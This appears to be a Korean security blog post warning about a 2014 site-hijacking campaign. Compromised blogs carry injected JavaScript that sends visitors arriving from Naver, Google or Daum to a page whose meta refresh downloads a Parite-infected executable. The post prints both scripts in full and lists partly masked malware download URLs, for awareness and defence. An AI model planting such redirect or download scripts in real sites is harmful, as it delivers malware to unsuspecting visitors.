기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여
접속 된 PC가 취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.
그래서 이전에 기존 사이트 변조와는 다른 iframe 을 이용한 악성코드 다운로드 방식을 소개 한 적이 있었다.
이번에 발견 된 내용은 이와는 또 다른 방식으로 악성코드를 다운로드 시키고 있다.
실제로는 아주 옛날부터 사용해왔던 방식이지만, 최근 6월 11일 부터 우후죽순으로 발생하고 있어 주의가 필요하다.
(일명, 사이트 납치라고도 불리운다)
※ 참고사항 ※
- 현재까지 해당 스크립트로 연결 된 EXE URI
http://61.147.**.***:9098/xl.exe
http://pds25.egloos.com/pds/*****/**/**/ics.exe
http://61.147.**.***:9098/Tistory.exe
http://pds26.egloos.com/pds/*****/**/**/Tistory.exe
http://pds25.egloos.com/pds/*****/**/**/tistory.exe
http://pds27.egloos.com/pds/*****/**/**/DynaPass32.exe
http://pds25.egloos.com/pds/*****/**/**/story.exe
http://www.e-****.kr/Pds/*******/GroupIcon/snss.exe
http://61.147.**.****:8878/xldos.exe
http://1402850290.************.com/sink/jie_sink.exe
http://61.147.**.***:9898/ccy.exe
http://61.147.**.***:9898/story.exe
http://61.147.**.***:9898/Tistory.exe
http://115.68.**.**:9898/story.exe
※ 모두 Virut or Parite 바이러스에 감염 되어 있는 상태이다.
그럼 간단하게 이번 방식에 대해서 알아보자.
우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.
유포 사이트에는 아래와 같은 스크립트가 삽입되어 있다.
<script language="javascript" type="text/javascript">
var url = document.referrer;
if (url.indexOf("naver")>0){
window.location.href="http://farmerr.link";
}
if (url.indexOf("google")>0){
window.location.href="http://farmerr.link";
}
if (url.indexOf("daum")>0){
window.location.href="http://farmerr.link";
}
</script>
해당 스크립트의 내용은 아주 간단하다.
Document.Referrer 함수를 이용하여 naver, google, daum 을 통해 해당 사이트에 접속을 하였다면,
http://farmerr.link 사이트로 URL을 반환하는 기능을 하는 스크립트이다.
아마도 해당 블로그가 해킹되어 제작자가 임의로 스크립트를 넣어 둔 것으로 보인다.
Mass injection 같은 해킹방법은 아닌 것으로 판단된다.
그래서 실제 사이트를 직접방문할 경우에는 아무런 반응이 없지만,
검색을 통해 사이트에 접속 할 경우에는 상황이 다르다.
(※ 부득이 하게 사이트명은 모자이크!!)
그리고 반환 된 URL(http://farmerr.link)로 접속하면 아래와 같이 스크립트를 통해 exe를 다운로드 받을 수 있게 되어 있다.
<script>if(top!=self) top.location=this.location;</script>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=EUC-KR">
<title>여러분의 방문을 환영합니다.</title>
<meta http-equiv="refresh" content="0;url=http://61.147.**.***:9098/xl.exe">
</head>
</html>
해당 다운로드 된 xl.exe 파일은 Win32.Parite.B 로 감염이 되어 있으며,
치료는 기본 백신에서도 가능하고 아래의 전용백신으로도 가능하다.
'IT 보안소식' 카테고리의 다른 글
| 스미싱(Smishing), "미디어파이(mediafire)" 서버를 이용한 스미싱 메시지 주의 (0) | 2014.06.19 |
|---|---|
| 한RSS(HanRSS), 한rss 홈페이지 정상화 (06-19 11:00) (0) | 2014.06.19 |
| 한RSS(HanRSS), 내부 서버 오류로 인한 접속 실패 (2014-06-17) (2) | 2014.06.17 |
| [SpamMail] "이쁜 강아지 무료분양!" 을 사칭하여 호스트(Hosts)파일을 변경하는 스팸메일 주의!! (32) | 2014.06.12 |
| 구글 크롬(Google Chrome), 35.0.1916.153 업데이트!! (0) | 2014.06.12 |
댓글